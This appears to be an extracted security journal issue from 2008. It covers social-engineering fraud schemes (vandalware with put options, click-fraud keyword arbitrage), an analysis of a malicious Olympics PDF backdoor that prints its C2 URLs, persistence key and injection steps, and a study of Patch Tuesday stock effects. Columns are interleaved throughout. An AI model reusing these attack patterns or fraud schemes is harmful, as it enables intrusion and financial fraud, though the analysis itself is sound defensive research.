have succeeded even if it situation. Who is the criminal? Nobody would be able to tell. had used public-key cryptography (which, by its nature, would have prevented anyone’s reverse-engineering the decryption key from the code, since it would never be contained there in the first Faking the Clicks place). The reason Archiveus might have failed is not technical, Click fraud is another common type of online fraud. It takes but lies in the monetization aspect: there was no way the criminals advantage of the fact that when a consumer clicks on an adver- could have safely collected the ransom without being traced. tisement, the advertiser pays a commission both to the web site displaying the ad and to the portal that provided the web site Vandalware Strikes with the ad. Related types of fraud take advantage of advertising in which money is transferred when the consumer views a ban- With the ransomware example in mind, let us now consider a ner ad (whether or not he takes action), and other approaches in new type of attack, which we can call vandalware. This attack which a sale or other action is generated as a result of someone does not carry out vandalism for fun or defiance, but rather for viewing an ad. The objective could be to profit from these trans- profit. Here is what the criminal would do: first, he or she would fers (criminals benefit when their web sites display the adver- select a company to target, and use data-mining techniques to tisements) or to drain the advertising budgets of competitors get as much detailed information as possible about vulnerable employees. By vulnerable employee, we mean an employee with access to sensitive data or access to the web page façade of the BBB complaint case company. From the vulnerable employee, a vandal might learn about the internal structure of the company, the names of key employees, and the format of email addresses. Second, the crimi- BBB CASE #569822971 nal would buy put options for that company. (We are assuming Complaint filed by: Michael Taylor that it is a publicly traded company.) A put option is a financial Business Name: instrument that increases in value if the corresponding stock Complaint filed against: Contact: BBB Member: falls in price; investors and speculators use put options to turn Complaint status: - a profit from an insight that a given stock is soon to lose value. Category: Contract Issues Most likely, other investors, not just the criminal, would also buy Case opened date: 2/28/2008 put options, especially if the stock of the targeted company has a Case closed date: - reasonable trading volume. Third, the criminal would unleash an attack against the company, perhaps by sending selected employ- *** Attached you will find a copy of the complaint. Please download and ees spoofed email appearing to come from another employee, keep this copy so you can print it for your records.*** such as their boss: “Hi Jim. Please take a look at the attached On February 26 2008, the consumer provided the following information: (The consumer indicated he/she DID NOT received any response from the PowerPoint slides and let me know what you think. If possible, business.) I’d like a quick assessment by tomorrow morning. Hope you can The form you used to register this complaint is designed to improve public access to the Better Business Bureau of Consumer Protection Consumer make it.” Or perhaps from a system administrator: “There is a Response Center, and is voluntary. Through this form, consumers may dangerous new computer virus, and our systems are not properly electronically register a complaint with the BBB. Under the Paperwork Reduction Act, as amended, an agency may conduct or sponsor, and a patched yet to defend against it. Please install the attached person is not required to respond to, a collection of information unless it program on your computer right away to help us stay secure. displays a currently valid OMB control number. That number is 502-793. © 2008 BBB.org, All Rights Reserved. Do this as soon as you can.”

Figure 1: The Better Business Bureau scam. The email contains an infected attachment, which the attacker hopes will be opened by the recipient.

14 McAFEE SECURITY JOURNAL (when the competitors are the advertisers from whom money is 634 people coming to his site clicks on the mesothelioma ad, transferred). Often, criminals generate traffic in an automated he makes a profit. But why would someone do that? Assume manner, making it appear as though real people viewed the ads. that the web site content is an article, apparently written Automation can include some form of malware, such as a bot- by a medical doctor, asking “Did you know that 10 percent net. Another common approach is for criminals to hire people to of asthma sufferers are at risk to contract mesothelioma?” click on selected ads; this is referred to as a “click farm.” Although this is not a truthful statement, it will make many We will now describe how social engineering can be used in people who are concerned with asthma and who are unaware a new kind of click fraud attack. First, we’ll begin by explaining of what mesothelioma is to do exactly what the criminal a common scenario that is not click fraud: wants—to click. Will half of all visitors fall for it? With a thousand visitors per day, that means a daily profit of more • Scenario 1 Standard web site. Consider a legitimate web site than $30,000. Even with less conspicuous keywords, the that provides some service, and that displays advertisements criminal can still make a pretty decent profit. which relate to this service. The contents of the ads are typically determined in an automated manner by the ad portals What makes the three scenarios differ is the intent—and the use (for example, Google and Yahoo) by automatically review- of social engineering. From the ad providers’ perspective, these ing the contents of the web site and selecting ads on topics three scenarios are very similar in structure. A visitor comes in, related to the contents. If the web site is devoted to cooking, reads content, and clicks an ad. Although it is possible to match for example, then the ads may relate to pots, pans, and coffee keywords coming in and going out to find anomalies, it is also machines. These sites also commonly place ads that bring in possible for criminals to use one service provider to bring traffic traffic. Thus we would expect to see ads that use keywords in, and another one to carry traffic out. This strategy makes it such as “knife,” “Calphalon,” “Teflon,” and similar terms. hard to detect and stop this kind of attack, especially if it is car- There is nothing unusual about this type of site. ried out at small scale using a large number of sites.

• Scenario 2 Using arbitrage. Consider now a second web site that has content which selects ads corresponding to the Conclusion keywords “find a attorney.” (We do mean “a,” not “an.” We’ll explain why soon.) The site can do this by having lots of text Social engineering on the Internet is here to stay. We have (whether visible or not) that repeats this phrase. At the time of already witnessed its effects through phishing scams, and we are writing this article, the cost for this type of strategy falls in the starting to see how criminals use social engineering to improve range of $1.07 to $7.05 per keyword. The exact price depends the efficiency of spam and crimeware. Even more skilled applica- on the venue, the time of the day, and, of course, the compet- tions than we currently see are just around the corner, we fear, as ing bids for the keywords because all keyword prices are estab- is the use of social engineering for other types of fraud—such as lished by auctions. Thus, if a user clicks on an ad on this site, click fraud. We can design technical countermeasures with this the owner of the corresponding ad would pay that amount to in mind, and understanding the ways attacks are likely to occur the portal, which in turn would transfer the amount—minus will help improve the defenses. But we must also understand that commission—to the web site that displayed the ad. our strategy requires better user interfaces, better procedures, next, imagine that the site in question places an advertisement stronger legislation, and improved education. The good guys still using the keyword “find an attorney.” The only difference have a lot of work to do. here is the article—“a” versus “an.” The price range for this keyword is $0.87 to $3.82. We will assume that the web site pays $2.00 for each visitor it brings in, and receives $4.00 for each visitor who clicks an ad on the site. As long as 50 percent of the visitors who arrive via the $2.00 ad click on a $4.00 ad, Dr. Markus Jakobsson is a Principal Scientist at Palo Alto Research Center. He researches phish- then the site makes a profit, without providing any service. This ing and countermeasures, click fraud, the human is referred to as keyword arbitrage. It is not quite click fraud, factor in security, cryptography, network security, but it’s close, as we shall see. and protocol design. He is an editor of Phishing and Countermeasures (Wiley, 2006) and co-author • Scenario 3 An attack using social engineering. Now we’ll of Crimeware: Understanding New Attacks and see how a criminal might use social engineering and extend Defenses (Symantec Press, 2008). the arbitrage technique to make a spectacular profit. Let’s Image courtesy of PARC, photographer Brian Tramontana assume that the criminal produces a web site that generates the keyword “mesothelioma” (a rare form of cancer caused by asbestos exposure). As we write, this is a Google keyword worth $63.42. The criminal buys traffic for the keyword “asthma” ($0.10) to bring visitors to his site. If at least one

FALL 2008 15

A Prime Target for Social Engineering Malware

By Elodie Grandjean

Malware writers often use social engineering methods to directly infect a system or host, or to start a cascade of downloading and executing malware.

Most of us have received an email containing a malicious attach- • Threatening emails, mentioning jail sanctions or jury-duty ment or URL while reading about an important security update or procedures a long-lost friend who wants to re-establish contact. • Free games and screensavers containing a Trojan, or free anti- Don’t be fooled into thinking that email is the only attack vector spyware tools, which are often rogue programs themselves for spreading malware via social engineering tricks. There are • Big events, such as sports, extreme weather disaster, plenty of other ruses, including using popular instant messaging or urgent news services. A friend’s compromised system might send you a message with a URL pointing to a file and asking you to look at some • Celebrity names and reports on their adventures and misbehavior pictures. The problem is you trust the contact and are unaware • Potentially trusted or secret relationships such as affiliation with that the other system is infected. In many cases, the URL points social networking web sites, fake friends, school classmates or to malware. relatives, and secret lovers Other malware uses social engineering to steal confidential The list of topics is potentially limitless and there’s plenty of information such as login credentials, credit card numbers, and appeal to large groups of global users. The list also highlights so on. These techniques are typically used in phishing attacks or the fact that social engineering can often target national or even server intrusions. local groups of users. For example, a global attack referencing The most common social engineering tricks malware writers a popular social networking web site may bring responses from use are for “adult” services. Here’s a list of others, though it’s around the world to the malware author; on the other hand, a hardly exhaustive: similar attack on the U.S. presidential election will likely ensnare only American victims. • Pornographic links and images • Using a female name in the sender field • Political agendas, including solicitations for contributions in the name of a popular candidate • Fake emails for banks, online payment services, and other financial services. These request a confirmation or an update of login credentials or credit card information.

16 McAFEE SECURITY JOURNAL Why Pick on the Olympics?

China has been in the spotlight for months due to the 2008 Olympic Games in Beijing. Media interest has been huge, covering athletes, fans, infrastructure, environment, and politics, Using the Olympic Games as the social among other topics. engineering focus allowed the malware On the political front, protests over the status of Tibet have authors to target many sports enthusi- been a highly sensitive topic; many “Free Tibet” organizations around the world have benefited from the Olympics spotlight. asts, as well as all the previously targeted Other issues, regarding the slave labor and human rights, have people who were interested in the Tibet- also raised their profile. And many Internet users are interested enough to read news and other stories online. China conflict. The Olympic torch became a hot symbol for protesters in the run-up to the games. The torch’s travel around the world created huge media coverage and developed even more interest and involvement among both fans and opponents. This growing interest also increased the size of the potential attack area that At this point, the victim base increased from targeted organizations malware writers could exploit. and their supporters to anyone curious about conditions in Tibet. Again, media attention aided this growth in the vulner- Sampling Victims able population. Next, malware writers took advantage of the Olympic Games A social engineering attack usually needs to “sample” its victims themselves to propagate social engineering attacks with the beforehand in order to succeed. Let’s see who the potential appearance of the pro-Tibet rootkit.2 This malicious set of files victims are of an attack using the China-Tibet conflict or the operated under cover of a movie file ridiculing the efforts of a Olympic Games as a lure. Chinese gymnast; while the cartoon runs, several malicious files silently drop and a rootkit is installed on the victim’s computer We’ve already seen individuals from pro-Tibet groups receive to hide them. emails containing a CHM (compiled help files), PDF, PPT, XLS, or DOC attachment related to the Tibet situation, China in general, Using the Olympic Games as the social engineering focus allowed or the Olympics. All of these emails appeared to have been sent the malware authors to target many sports enthusiasts, as well from a trusted organization or person. It’s likely these users were as all the previously targeted people who were interested in the accustomed to receiving such documents from their supporters Tibet-China conflict. and were perhaps not very vigilant. These particular attachments were malicious: they used various Microsoft Complied HTML Help, Adobe Acrobat, Microsoft Excel, Microsoft PowerPoint, or Microsoft Word vulnerabilities to drop and silently execute embedded executable files. At this point the targeted attack area was relatively small, but the media coverage of Tibet protests helped to ignite the fuse. Later we witnessed some legitimate web sites devoted to sup- porting Tibet were hacked to embed the Fribet Trojan,1 which can download itself onto visitors’ machines by exploiting vulnerabilities in web browsers.

FALL 2008 17 Case Study: An Olympics Malware Attack finds the directory where Acrobat is installed, and then opens book.pdf. Figure 4, next page, shows the code in the dropper file We recently received the PDF file declaration_olympic_games_ that is responsible for this action. eng.pdf, which was initially emailed to a pro-Tibet group. (See The malware also drops another executable file, book.exe, which Figure 1.) This document seemed innocent because when the copies itself under %ALLUSERSPROFILE%\Application Data\ application opened, this text appeared and nothing crashed or msmsgs.exe and creates a new Windows Service.4 This new ser- immediately went awry. Thus, most people did not suspect any vice goes by the service and display name “Logical Disk Manager malicious activity. However, in the background, some malicious Service” and ensures that Windows will automatically run the files were silently created on the victims’ machines. Let’s see Trojan at start-up. exactly how the attack works. The malware even has a “Plan B” for hooking the startup In fact declaration_olympic_games_eng.pdf is an empty PDF file process: If it fails to create the service, it will add a new registry that exploits a vulnerability in Acrobat to drop and execute the entry, Windows Media Player, which points to msmsgs.exe. first part of the malicious package. This malicious executable file Windows Media Player is added to the following start-up key in 3 (detected as BackDoor-DOW ) is embedded in an encrypted form the Windows registry5: HKEY_LOCAL_MACHINE\SOFTWARE\ at the following location shown in the hex editor in Figure 2 Microsoft\Windows\CurrentVersion\Run. The Trojan also creates (next page). two files containing some encrypted data: Figure 3 (next page) shows the first bytes of the embedded file • C:\WINDOWS\jwiev.log.bak once decrypted. • C:\WINDOWS\clocks.avi.bak This executable file drops the legitimate PDF file book.pdf, which is displayed when we execute the first file. The dropper file looks for the process AcroRd32.exe in the list of the active processes,

Figure 1: Pro-Tibet supporters recently received this appar- Sponsor’s declaration of responsibility ently legitimate file as an email at the 2008 Beijing Olympic Games attachment. WITH REFERENCE TO, and consistent with, our obligations under the Olympic Charter, the undersigned sponsor of the 2008 Beijing Olympic Games hereby declares: We reaffirm our commitment to the “harmonious development of man, with a view to promoting a peaceful society concerned with the preservation of human dignity,” as set forth in the Olympic Charter, and We acknowledge that sponsorship of the Olympic Games carries certain responsibilities, including the responsibility of implementing our sponsorship and communications programs in a manner that promotes awareness of basic human rights such as the right to free speech, and We are fully aware of the assurance made by the government of the People’s Republic of China to the Olympic Committee to improve its human rights record as a condition for hosting the Olympic Games and recognize the worldwid concerns expressed about China’s human rights record. IN FURTHERANCE TO THE ABOVE, we agree to demonstrate our commitment to human rights at the 2008 Beijing Olympics by: FIRST, making bona fide good faith efforts to raise the issue of human rights with our Chinese contacts and to publicly report on our efforts to do so, and SECOND, designating a high-level executive within our organization to monitor every aspect of our activities associated with the Olympics and to assure that our actions properly reflect our commitment to human dignity and human rights, and THIRD, establishing a fund through which contributions can be made to prisoners of conscience in China, and their families, as well as to those persecuted in connection with the 2008 Olympic Games, and FOURTH, presenting a corporate resolution to our Board of Directors resolving to adopt this Declaration, and the principles of human rights and human dignity upon which it is based, prior to the commencemento of the 2008 Olympic Games in Beijing, and FIFTH, incorporating this Declaration of Responsibility into our commercial messages. DECLARED BY

Name/Title Date

18 McAFEE SECURITY JOURNAL Finally book.exe cleans up by creating a batch file that deletes The malicious code injected into svchost.exe calls the workFunc() itself and self-terminates. From that point, the baton is passed to function from avp01.lic, which connects to a remote server and msmsgs.exe to take over. sends three requests: Msmsgs.exe temporarily drops another file at the following • http://www1.palms[removed]/ld/v2/loginv2.asp?hi=2wsdf351 location: C:\Program Files\WindowsUpdate\Windows Installer.exe. &x=0720080510150323662070000000&y=192.168.1.122&t Just before being deleted, Windows Installer.exe drops two 1=ne copies of a DLL file into: • http://www1.palms[removed]/ld/v2/votev2.asp?a=7351ws2&s= • C:\Documents and Settings\All Users\DRM\drmv021.lic 0720080510150323662070000000&t1=ne • C:\Documents and Settings\All Users\DRM\avp01.lic • http://www1.palms[removed]/ld/v2/logoutv2.asp?p=s9wlf1&s= The malware injects itself into svchost.exe to hide its activity. It 0720080510150323662070000000&t1=ne launches a new instance of svchost.exe (the legitimate system The x and y parameters may differ. The value of x is formed by process6), allocates a block of memory within the address space concatenating “07” with the exact date (2008/05/10) and time of this new process, writes a copy of itself into the virtual address (15:03:23) the file clocks.avi.bak was created, and then by end- space of svchost.exe (at the address 0x400000), and runs the ing with the hard-coded string “662070000000.” The value of malicious code by creating a remote thread. y is the IP address of the victim’s computer.

Figure 2: This malicious PDF carried an encrypted copy of the malware BackDoor-DOW.

Figure 4: The malware looks for Acrobat Reader (AcroRd32.exe) and then opens the innocent file book.pdf.

Figure 3: The unencrypted version of BackDoor-DOW.

FALL 2008 19 This malware trend may spread in the upcoming months. It is a serious concern because most people trust security vendors; if that trust were lost, many users

The three server-side scripts loginv2.asp, votev2.asp, and log- would be even more likely to suffer. outv2.asp inform the attacker that a new compromised machine is available to check if a command has been sent from the attacker and to stop the backdoor, respectively. To read the response sent after connecting to one of the server-side scripts, the Trojan creates a copy of the returned web page in the following folder: C:\Program Files\InstallShield Installation Information\ The filename consists of a six-digit random value and, once read, the file is deleted. loginv2.asp and logoutv2.asp return only Rogue Software and Sites blank web pages (with tags), but votev2.asp returns either code that roughly means “The Creative hooks for social engineering attacks are not limited to backdoor is ready but there is no action needed at the moment” sporting events. For several months, we have noticed an increase (@n4@300@) or a command such as one of the following: in malicious software posing as applications from “security” vendors. These programs lure victims into infecting their comput- • @n11@http://www1.palms[removed]/ld/v2/sy64. ers by appearing to be helpful. Several variants of the FakeAlert7 jpg@%SystemRoot%\Dnservice.exe@218c663bea3723a3dc9d Trojan warn their victims that their machines are infected (don’t 302f7a58aeb1@ you love the irony!) and provide information (often malicious • @n11@http://www1.palms[removed]/ld/v2/200764.jpg @% URLs) for retrieving “anti-spyware” tools, which are in fact rogue SystemRoot%\Soundmax.exe@5f3c02fd4264f3eaf3ceebfe94f applications themselves. fd48c@. Given the importance of keeping your software current, it wasn’t Either command roughly means “download the aforementioned long before rogue “update” web sites began to imitate the real file with the .JPG extension and drop it in the %SysDir% folder Windows Update site. We recently discovered a sophisticated on the victim’s machine by using the provided executable file- method using DLL components—linked to a fake Windows name.” The last part of the response is the md5 hash of the file Update site—that prevented Internet Explorer from warning users that is going to be downloaded (and that will be used to check when a remote web server used an invalid certificate for a secure the file’s integrity). (HTTPS) web site. The purpose of this attack was to disguise mali- During this entire process, victims are none the wiser about what cious files as real Windows updates that victims would download is happening in the background. While they read and fill in the and execute. declaration that has been dropped by the malicious PDF file, the This malware trend may spread in the upcoming months. It is a backdoor is silently installed on their computers, waiting for com- serious concern because most people trust security vendors; if that mands from the attacker. At this point, any other malicious files can trust were lost, many users would be even more likely to suffer. be downloaded on the machine as well, as it is fully compromised.

20 McAFEE SECURITY JOURNAL Conclusion

Sporting events are frequently used as bait for social engineer- These attacks are so elaborate that the victims will probably not ing attacks. That malware developers would turn their attention suspect anything. As we learned from the case study, we face to the Beijing Olympics was easy to foresee. The event offered threats not only from unknown senders and email attachments all the ingredients for a perfect recipe: small targeted attacks with an .exe extension. Legitimate documents (Microsoft Word, grew larger in scope as the number of victims interested in the Microsoft Excel, Microsoft PowerPoint, and others) can also be topic increased. This growth was possible due to closely related malicious. It is partly because of the naive belief that data files issues—concern over Tibet led to the global torch relay, which led cannot hold malware that these attacks are so successful. to the Olympics themselves. The media often plays an important Ultimately, people tend to be more aware of common tricks, which role in increasing the popularity of an event. Their efforts lead in turn forces attackers to become more creative and nefarious in some victims to search for further information, but they often their techniques to remain victorious over their victims. stumble onto related but malicious web sites or, more commonly, legitimate web sites that are compromised and silently infect unsuspecting visitors.

Elodie Grandjean has been working as a Virus Researcher for McAfee Avert Labs in France since January 2005. She has more than five years of experience in reverse engineering on Windows platforms. Grandjean specializes in anti-reverse- engineering techniques, unpacking, and decryption, and has written for French security magazine MISC: Multi-System & Internet Security Cookbook. When she is not analyzing malware or programming, Grandjean is probably browsing the Internet, unless she is attending a live concert or enjoying a Belgian beer in a pub with her friends.

endnotes 1 Fribet, McAfee VIL. http://vil.nai.com/vil/content/v_144356.htm 7 FakeAlert-B, McAfee VIL. http://vil.nai.com/vil/content/v_139058.htm 2 “Is Malware Writing the Next Olympic Event?” McAfee Avert Labs Blog. http:// FakeAlert-C. http://vil.nai.com/vil/content/v_139219.htm www.avertlabs.com/research/blog/index.php/2008/04/14/is-malware-writing- FakeAlert-D. http://vil.nai.com/vil/content/v_140346.htm the-next-olympic-event/ FakeAlert-D!56c05f7f. http://vil.nai.com/vil/content/v_142850.htm 3 “BackDoor-DOW,” McAfee VIL. http://vil.nai.com/vil/content/v_144476.htm FakeAlert-H. http://vil.nai.com/vil/content/v_141377.htm 4 “Services,” Microsoft Developer Network. http://msdn.microsoft.com/en-us/ FakeAlert-I. http://vil.nai.com/vil/content/v_141466.htm library/ms685141(VS.85).aspx FakeAlert-G. http://vil.nai.com/vil/content/v_141163.htm 5 “Registry,” Microsoft Developer Network. http://msdn.microsoft.com/en-us/ FakeAlert-M. http://vil.nai.com/vil/content/v_142807.htm library/ms724871(VS.85).aspx FakeAlert-Q. http://vil.nai.com/vil/content/v_143088.htm 6 “A description of Svchost.exe in Windows XP Professional Edition,” Microsoft FakeAlert-R. http://vil.nai.com/vil/content/v_143102.htm Help and Support. http://support.microsoft.com/kb/314056/en-us FakeAlert-S.dll. http://vil.nai.com/vil/content/v_143110.htm FakeAlert-T. http://vil.nai.com/vil/content/v_143406.htm Generic FakeAlert.a. http://vil.nai.com/vil/content/v_143470.htm

FALL 2008 21 Vulnerabilities in the Equities Markets

By Anthony Bettini

The recent credit turmoil in the equities and derivatives markets has put significant focus on many facets of the financial industry not limited to regulatory control structures, ratings agencies, hedge funds, private equity, pension funds, and other market makers.

With this constant media attention, people in related sciences • Are social engineering events involving vulnerabilities and (such as bioinformatics, computer scientists, etc.) are beginning equities occurring today? Could there be even more such to take a closer look at financial engineering. events in the future? With our background in vulnerability research and given the con- As this is a broad topic of study, let’s begin by analyzing only text of the media emphasis on the credit crisis, it’s natural to look vulnerabilities in Microsoft products. In the near future, we for vulnerabilities in the equities and derivatives markets. At the expect to complete some complementary data with other 2007 Black Hat USA Conference, Matasano Security looked at software developers, as well as a comparison of the economics the Financial Information eXchange (FIX) protocol, which forms of patch distribution methods (for example, Microsoft’s monthly the underpinning for the message passing between investment release versus Oracle’s quarterly release versus other vendors’ managers executing many trades on behalf of clients and broker as-needed release schedules). and dealers.1 2 Matasano’s related research asks questions such as “What vulnerabilities may be present in the FIX protocol?” This was an interesting look at financial protocols from a security The Hypothesis weakness standpoint. However, our article will take a different Patch Tuesday is the second Tuesday in the month. It’s the one tack: we are more concerned with the financial and social engi- day of each month when Microsoft releases primarily security neering rather than the vulnerability aspect. and functional updates for Windows and its other applications. Our research begins with the follow questions: Our hypothesis is that on Patch Tuesday, there is downward • What are the stock price implications of Microsoft’s pressure on the price of Microsoft stock (ticker name: MSFT). Patch Tuesday? This pressure is likely due to reactions to news articles about the negative implications of security vulnerabilities in Microsoft • What about the day before Patch Tuesday? software. Similarly, there is probably an uptick the following • What about the day after Patch Tuesday (sometimes called day, Wednesday, when people realize that Microsoft stock was Exploit Wednesday)? oversold the prior day.

• What about Advance Notification Thursday? Are People Making Money from Patch Tuesday? • What about zero-day threats? It would seem so. At the very least, it appears that there is a cor- • Do investors even notice these events? relation between Microsoft stock price fluctuations and the Patch Tuesday release cycle. For instance, consider Figure 1 (next page).

22 McAFEE SECURITY JOURNAL The first row, “Full-year average,” is our baseline average of the three years and continues today. Although the open-to-close is difference between Microsoft’s stock price at the opening of trad- probably easiest to understand, the trends can be seen in the ing versus their price at the close of the day. Included as an alter- average open-to-high (price of the day) and average open-to-low native baseline is the “Non-event days” average, which excludes as well; although, in some cases, this effect is less strong. events such as Advance Notification and Patch Tuesday. It would In Figure 2 we see that generally the average intraday high on an appear that when Microsoft issues an “Advance Notification,” on Advance Notification day and a Patch Tuesday are lower than the average the price has stronger-than-average downward momen- average intraday high for the year. We also see that the average tum. Similarly, on an average Patch Tuesday, there is stronger- intraday high on a day following a Patch Tuesday is generally than-average downward momentum. Even more interesting is higher—pointing to stronger upward pressures. that on Exploit Wednesday (the day after Patch Tuesday), there is, on average, an uptick or net-positive close. This is probably In Figure 3 we discover that the average intraday low on a Patch because institutional investors or market makers feel Microsoft Tuesday is generally lower than the average intraday low for the was oversold the day before because of the bad news and that, full year. However, for an Advance Notification day, the results in reality, Microsoft’s value as an investment was only negligibly are more mixed. Also relevant is that the average intraday low affected. Note that this trend has been consistent during the past on a day following a Patch Tuesday is usually higher than the full year average, pointing to stronger upward pressures.

Microsoft stock price change from the day’s open to close Microsoft open to intraday low

MSFT CHANGE FROM OPEN TO CLOSE 2008 2007 2006 MSFT CHANGE FROM OPEN TO LOW 2008 2007 2006

Full-year average -0.17% 0.06% 0.08% Full-year average -1.35% -0.89% -0.64%

Non-event days -0.20% 0.07% 0.08% Non-event days -1.39% -0.90% -0.64%

Advance Notification -0.43% -0.12% -0.08% Advance Notification -1.24% -1.24% -0.36%

Patch Tuesday -0.45% -0.29% -0.11% Patch Tuesday -1.58% -0.99% -0.93%

Every Tuesday 0.16% 0.05% -0.03% Every Tuesday -1.16% -0.81% -0.74%

Tuesday, but not Patch Tuesday 0.37% 0.15% -0.01% Tuesday, but not Patch Tuesday -1.01% -0.76% -0.68%

Day after Patch Tuesday 0.49% 0.21% 0.27% Day after Patch Tuesday -0.91% -0.74% -0.47%

Every Wednesday -0.18% 0.44% 0.29% Every Wednesday -1.39% -0.78% -0.51%

Wednesday, but not Wednesday, but not -0.40% 0.51% 0.26% -1.56% -0.79% -0.54% day after Patch Tuesday day after Patch Tuesday

Figure 1: Examining the change in Microsoft’s stock price on key days shows a Figure 3: Patch Tuesday retains its “low” position when compared with the average consistent three-year trend. intraday low for the year.

Microsoft open to intraday high

MSFT CHANGE FROM OPEN TO HIGH 2008 2007 2006

Full-year average 1.28% 0.97% 0.88%

Non-event days 1.34% 0.95% 0.88%

Advance Notification 0.93% 1.08% 0.58%

Patch Tuesday 0.92% 0.98% 0.67%

Every Tuesday 1.35% 1.01% 0.92%

Tuesday, but not Patch Tuesday 1.50% 1.02% 0.99%

Day after Patch Tuesday 1.52% 1.30% 0.70%

Every Wednesday 1.25% 1.24% 0.92%

Wednesday, but not 1.17% 1.23% 0.95% day after Patch Tuesday

Figure 2: In intraday trading Advanced Notification days and Patch Tuesdays deliver consistently lower stock price averages compared with other days of the year.

FALL 2008 23 A word of caution for the casual day trader or retail investor: Consider that fake vulnerability disclosures and rumors already these price fluctuations are relatively small and tightly time con- appear today on mailing lists such as Full Disclosure or on IRC strained. Profiting at a retail level from such trades would require chat rooms. It’s possible that events could be orchestrated via risking a large amount of capital. A further word of caution is social engineering to manipulate the market and its participants. that the data set depicted is relatively small and, thus, by nature, This scenario would clearly be illegal; but where there is profit, of relatively low quality. For instance, there are only about 260 there are often people willing to break laws. Similarly, as we will trading days per year, of which only 12 fall on a Patch Tuesday. see later, not all attacks would involve social engineering. Some Although the data set and fluctuations are small, this level of may even be legal. correlation is likely to be interesting only to institutional investors Situations such as these—short-term market predictability and should be modeled appropriately. yielding to profits—at least according to the Efficient Market Now let’s look at some comparative potential profit spreads Hypothesis (EMH) and the Random Walk Hypothesis are unlikely in Figure 4. to exist, and are certainly not likely to persist.3 4 As such, we caution readers, as all financial entities should, and state that “past In Figure 4 it appears that purchasing near the average intra- performance does not necessarily indicate future results.”5 day low on a Patch Tuesday and then selling near the average intraday high on the next day would yield a small profit (until this trade becomes more common, resulting in the dampening Leveraging Share Volume as an Indicator of the effect). The profit spreads shown above focus on actual vulnerability Another working theory we had was that the Patch Tuesday cycle disclosures that occur based on the assumption that other people had dampened the effect of negative press that would have work in a predictable manner. However, just as rumors of a been seen during the days of unscheduled bulletin releases (prior hostile takeover impact the price of a stock, the rumor of several to mid-October 2003). A cursory glance at the volume of shares critical defects putting consumers at risk could do so as well. indicator appears to support this theory. (See Figure 5, next page.)

Potential profit spreads

SPREADS 2008 2007 2006

Intraday Intraday Intraday Intraday Intraday Intraday

low high low high low high

Full year (intraday low) to full -1.35% 1.28% -0.89% 0.97% -0.64% 0.88% year (intraday high) Figure 4: Buying stock on a Patch Tuesday (intraday low) to Patch Tuesday and selling it the -1.58% 0.92% -0.99% 0.98% -0.93% 0.67% Patch Tuesday (intraday high) next day can apparently offer a legitimate profit, but only when Patch Tuesday (intraday low) to day -1.58% 1.52% -0.99% 1.30% -0.93% 0.70% trading in large quantities and after Patch Tuesday (intraday high) with considerable risk.

24 McAFEE SECURITY JOURNAL Microsoft volumes, 2002–03

MSFT VOLUME DIFFERENTIALS (UNSCHEDULED) 2003 2002

Average volume, full year (in shares traded per day) 65,074,644 76,903,678

Average volume, full year (non-event) 64,512,432 76,503,325

Average volume, day of unscheduled bulletin 70,017,743 78,796,255 Figure 5: Microsoft’s trade Average difference in volume 7.60% 2.46% volume before its move from unscheduled bulletins to Average difference in volume relative to non-events 8.53% 3.00% Patch Tuesday.

Patch Tuesday releases

MSFT VOLUME DIFFERENTIALS (SCHEDULED) 2008 2007 2006 2005 2004

Average volume, full year 84,898,274 62,506,437 67,074,387 66,612,503 66,793,733

Average volume, full year (non-event) 86,738,696 64,210,868 68,753,419 67,227,483 67,260,018

Average volume, day of Patch Tuesday 75,584,620 57,840,233 63,786,108 65,453,142 65,439,875

Average volume Tuesday, 79,818,571 59,305,574 64,967,877 69,691,473 66,471,610 but not Patch Tuesday

Average MSFT difference in volume -10.97% -7.47% -4.90% -1.74% -2.03% (Patch Tuesday to full year)

Average MSFT difference in volume -12.86% -9.92% -7.22% -2.64% -2.71% (Patch Tuesday to non-events)

Average ^IXIC volume, full year 2,249,267,340 2,089,534,502 1,926,859,522 1,731,835,794 1,769,480,040

Average ^IXIC volume, full year 2,271,900,270 2,094,466,552 1,935,854,692 1,732,949,769 1,768,463,981 (non-events)

Average ^IXIC volume on Patch Tuesday 2,161,318,000 2,054,922,500 2,009,946,667 1,745,967,500 1,759,816,667

Average ^IXIC volume on Tuesday, 2,249,947,143 2,107,280,909 1,813,831,818 1,658,301,818 1,752,408,182 but not Patch Tuesday

Average ^IXIC difference in volume -3.91% -1.66% 4.31% 0.82% -0.55% (Patch Tuesday to full year)

Average ÎXIC difference in volume -4.87% -1.89% 3.83% 0.75% -0.49% (Patch Tuesday to non-events) Figure 6: Instituting Patch Difference in MSFT Patch Tuesday vs. -5.30% -2.47% -1.82% -6.08% -1.55% MSFT non-Patch Tuesday Tuesday Tuesday has apparently con- vinced traders that there’s no Difference in ÎXIC Patch Tuesday vs. -3.94% -2.48% 10.81% 5.29% 0.42% advantage to be gained solely ÎXIC non-Patch Tuesday Tuesday from Patch Tuesday events.

FALL 2008 25 In Figure 5 (page 25) we see that on the day of release of an unscheduled bulletin in 2003 and 2002, the average volume of shares traded outpaced the average volume for the year, by 7.6 It is possible people are already using zero- percent and 2.46 percent, respectively, on average. When com- day threats for financial gain, not simply for paring only non-event days for the average volume for the full year, this figure jumps to 8.53 percent and 3 percent, respectively. embedding them within password-stealing This contrasts, quite sharply, with the volume differentials of the Trojans but for taking short or options posi- more predictable Patch Tuesday releases, shown in Figure 6 (page tions in equities and derivatives. 25). We’ve also included a comparison between Microsoft (MSFT) and the NASDAQ Composite Index (^IXIC). This would imply the effect of changing from unscheduled (random walk) to prescheduled (Patch Tuesday) bulletins has dropped the interest level among traders for events associated with Patch Tuesday. Press Releases, Reactions, and Implications Next let’s look at the comparison data for Advance Notification (see Figure 7, below). The implications of this are interesting, and we hope this article will spur a fresh round of research on the influence of vulnerabili- Why is the average volume lower on Patch Tuesday and Advance ties and threats on the securities markets. Notification day? Our hypothesis is that the full-year average volume compared with the average Patch Tuesday volume can be For instance, consider the Emulex hoax.7 In this case, someone explained due to ”significantly large events affecting the full-year posted a fake press release about the CEO’s departure, which average” (from martingale probability theory) that are statistically resulted in a 62 percent drop in intraday trading of Emulex stock. less likely to occur on a Patch Tuesday because of its infrequency The person posting the fake release had taken a large short posi- (just 12 times per year).6 tion in the stock and profited more than US$250,000. This was a clear case of fraud. Similarly, there are periodic cases in the news about insider trading (also clearly illegal).

Advance notification

MSFT VOLUME DIFFERENTIALS (ADVANCE NOTIFICATION) 2008 2007 2006

Average volume, full year 84898274 62506437 67074387

Average volume, full year (non-event) 86738696 64210868 68753419

